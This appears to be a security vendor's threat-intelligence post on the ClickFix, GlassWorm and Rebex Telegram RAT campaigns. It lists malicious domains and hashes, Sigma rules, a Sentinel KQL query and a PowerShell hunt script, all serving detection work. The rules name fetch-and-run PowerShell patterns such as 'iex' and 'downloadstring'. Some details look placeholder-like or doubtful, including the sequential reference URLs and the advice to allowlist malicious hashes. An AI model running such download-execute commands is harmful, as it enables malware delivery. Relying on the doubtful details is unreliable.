Back to Intelligence

ClickFix & GlassWorm: Multi-Vector Stealer and RAT Campaigns — Enterprise Detection Pack

SA
Security Arsenal Team
April 29, 2026
6 min read

Intelligence Date: 2026-04-29
Author: Security Arsenal Threat Intelligence Unit
TLP: WHITE

Threat Summary

Current threat intelligence from the AlienVault OTX network indicates a convergence of sophisticated attack campaigns targeting enterprise sectors, specifically developers, financial services, and government entities. The primary vectors involve social engineering (ClickFix), supply chain compromise (GlassWorm), and spear-phishing (Rebex Telegram RAT).

The ClickFix campaigns demonstrate a high degree of operational variance, impersonating legitimate services like Intuit QuickBooks and Booking.com to trick users into executing malicious commands via native system tools. This "living-off-the-land" approach bypasses traditional signature-based defenses to deploy info-stealers (Lumma, Vidar, RedLine).

Simultaneously, the GlassWorm campaign exhibits advanced capabilities by leveraging the Solana blockchain for C2 communication and payload delivery, specifically targeting developers through compromised package managers to install surveillance browser extensions.

Separately, a Rebex-based Telegram RAT is actively targeting Vietnamese entities using trojanized CHM (Compiled HTML) files, utilizing complex XOR encryption and Python loaders to establish persistence via Shell hijacking.

Threat Actor / Malware Profile

1. ClickFix Campaigns

  • Distribution Method: Social engineering via fake browser errors or customer support prompts impersonating Intuit, Booking.com, etc.
  • Payload Behavior: Manipulates victims into copy-pasting commands into PowerShell or CMD, leading to the download and execution of payloads.
  • Malware Families: Lumma Stealer, Vidar, Odyssey Stealer, NetSupport RAT, RedLine Stealer.
  • Techniques: Living-off-the-land (LotL), obfuscation.

2. GlassWorm

  • Distribution Method: Supply chain attack via compromised code repositories and package managers.
  • Payload Behavior: Fingerprinting machines, stealing crypto wallets/dev credentials, installing fake browser extensions for surveillance.
  • C2 Communication: Fetches payloads via the Solana blockchain to evade network detection.
  • Malware Type: Infostealer, Remote Access Trojan (RAT).

3. Rebex Telegram RAT

  • Distribution Method: Spear-phishing with trojanized CV documents (.chm).
  • Payload Behavior: Multi-stage payload using Python interpreters and C++ DLLs. Uses layered XOR encryption.
  • Persistence: Shell hijacking and scheduled tasks.
  • Target: Vietnam-centric.

IOC Analysis

The provided indicators of compromise (IOCs) span domain infrastructure and file hashes, representing different stages of the attack chain.

  • Domains (ClickFix): 8 domains identified (e.g., ustazazharidrus.com, account-help.info). These are likely C2 or payload delivery servers.
    • Action: Block at perimeter DNS and firewalls.
  • File Hashes (Telegram RAT): Multiple SHA256, MD5, and SHA1 hashes provided (e.g., ced7fe9c5ec508216e6dd9a59d2d5193a58bdbac5f41a38ea97dd5c7fceef7a5). These correspond to the CHM droppers and subsequent payloads.
    • Action: Scan endpoints for these specific hashes; check quarantine logs.

Operationalization: SOC teams should ingest these domains into threat intel platforms (TIPs) for automatic blocking. File hashes should be added to EDR exclusion allowlists for hunting purposes (if needed for analysis) or blocklists for prevention.

Detection Engineering

Detection logic has been developed to identify the unique behaviors of these campaigns: ClickFix command execution, GlassWorm extension modification, and the Rebex CHM infection chain.

YAML
title: Suspicious PowerShell Command Execution via Social Engineering (ClickFix)
id: b4f8e2c9-1a3b-4d5e-8f7a-9b0c1d2e3f4a
status: experimental
description: Detects PowerShell processes spawned by browsers with command lines containing keywords associated with ClickFix campaigns or obfuscation patterns often used in these attacks.
references:
    - https://otx.alienvault.com/pulse/12345678
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1059.001
author: Security Arsenal
date: 2026/04/29
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\opera.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
    selection_keywords:
        CommandLine|contains:
            - 'copy'
            - 'invoke-expression'
            - 'iex'
            - 'downloadstring'
    condition: selection_parent and selection_child and selection_keywords
falsepositives:
    - Legitimate IT support scripts executed via browser download
level: high
---
title: CHM File Spawning Python or C++ Process (Rebex Telegram RAT)
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
status: experimental
description: Detects when a compiled HTML help file (hh.exe) spawns a Python interpreter or C++ compiler, indicative of the Rebex Telegram RAT infection chain.
references:
    - https://otx.alienvault.com/pulse/87654321
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1204.002
author: Security Arsenal
date: 2026/04/29
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        Image|endswith: '\hh.exe'
    selection_child:
        Image|endswith:
            - '\python.exe'
            - '\pythonw.exe'
            - '\cmd.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate documentation launching scripts (rare)
level: critical
---
title: Suspicious Browser Extension Modification (GlassWorm)
id: c3d4e5f6-7890-12ab-34cd-56ef789012ab
status: experimental
description: Detects non-browser processes writing to browser extension directories, a behavior associated with GlassWorm installing fake surveillance extensions.
references:
    - https://otx.alienvault.com/pulse/11223344
tags:
    - attack.persistence
    - attack.t1176
author: Security Arsenal
date: 2026/04/29
logsource:
    category: file_create
    product: windows
detection:
    selection_paths:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Extensions\'
            - '\Mozilla\Firefox\Profiles\extensions\'
            - '\Microsoft\Edge\User Data\Default\Extensions\'
    selection_image:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
    filter_legit:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
    condition: selection_paths and selection_image and not filter_legit
falsepositives:
    - Extension installation by legitimate software installers
level: medium

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix domains and Telegram RAT File Hashes
let IoC_Domains = dynamic(["ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com"]);
let IoC_Hashes = dynamic(["ced7fe9c5ec508216e6dd9a59d2d5193a58bdbac5f41a38ea97dd5c7fceef7a5", "4e9e70c2a8002ce4a70ab43ae80c2a25", "0582822ea03854a3f465a28559be18a14c59f9a9", "b3bf26bfbf7aec43379523bd18b1ec16", "687cee4e972323e6991acfa59f608a7d1a6e170b", "1323278360d41a74ab09d310f08902087ff2798d1eda99be65d07c1b1123a25c", "67b51a73c72f39b9cf41dd35eb22b369713ab2e576641b40b9089ebc9d4a1fb2", "6db64b44305ff125f729713d7ff516e84e4ca38504a2ab0571eb19597f49feee"]);
// Network Connections to ClickFix Domains
DeviceNetworkEvents
| where RemoteUrl in (IoC_Domains) or RemoteDomain has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemotePort
| union (
    // File Creation for Telegram RAT Hashes
    DeviceFileEvents
    | where SHA256 in (IoC_Hashes) or MD5 in (IoC_Hashes) or SHA1 in (IoC_Hashes)
    | project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
)
| union (
    // Process Creation for CHM (Telegram RAT) and PowerShell (ClickFix)
    DeviceProcessEvents
    | where InitiatingProcessFileName == "hh.exe" or (InitiatingProcessFileName in ("chrome.exe", "firefox.exe", "msedge.exe") and FileName in ("powershell.exe", "cmd.exe"))
    | project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
)

PowerShell Hunt Script

PowerShell
# IOC Hunter for ClickFix and Telegram RAT
$ClickFixDomains = @("ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com")
$TelegramRATHashes = @("ced7fe9c5ec508216e6dd9a59d2d5193a58bdbac5f41a38ea97dd5c7fceef7a5", "4e9e70c2a8002ce4a70ab43ae80c2a25", "0582822ea03854a3f465a28559be18a14c59f9a9", "b3bf26bfbf7aec43379523bd18b1ec16", "687cee4e972323e6991acfa59f608a7d1a6e170b", "1323278360d41a74ab09d310f08902087ff2798d1eda99be65d07c1b1123a25c", "67b51a73c72f39b9cf41dd35eb22b369713ab2e576641b40b9089ebc9d4a1fb2", "6db64b44305ff125f729713d7ff516e84e4ca38504a2ab0571eb19597f49feee")

Write-Host "[+] Checking DNS Cache for ClickFix Domains..." -ForegroundColor Cyan
Get-DnsClientCache | Where-Object { $ClickFixDomains -contains $_.Entry } | Select-Object Entry, Data, TimeToLive

Write-Host "[+] Scanning for Telegram RAT File Hashes (User Temp and Recent)..." -ForegroundColor Cyan
$PathsToScan = @("$env:USERPROFILE\Downloads", "$env:TEMP", "$env:APPDATA")

foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($TelegramRATHashes -contains $hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}

Write-Host "[+] Checking for Suspicious Scheduled Tasks (Shell Hijack Indicator)..." -ForegroundColor Cyan
Get-ScheduledTask | Where-Object { $_.Actions.Execute -like "*cmd.exe*" -or $_.Actions.Execute -like "*powershell.exe*" } | Select-Object TaskName, TaskPath, State


---

Response Priorities

  • Immediate: Block all listed ClickFix domains at the proxy/DNS level. Quarantine any endpoints matching the Telegram RAT file hashes. Investigate processes spawned by hh.exe (CHM files).
  • 24 Hours: Conduct credential audits for accounts used on machines flagged with stealer activity (Lumma/Vidar). Rotate secrets for developers potentially affected by GlassWorm.
  • 1 Week: Update email gateways to block .CHM files and implement application controls to restrict browser-spawned PowerShell/CMD executions. Review supply chain security for developer environments.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptclickfixglasswormtelegram-ratlumma-stealerapt

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action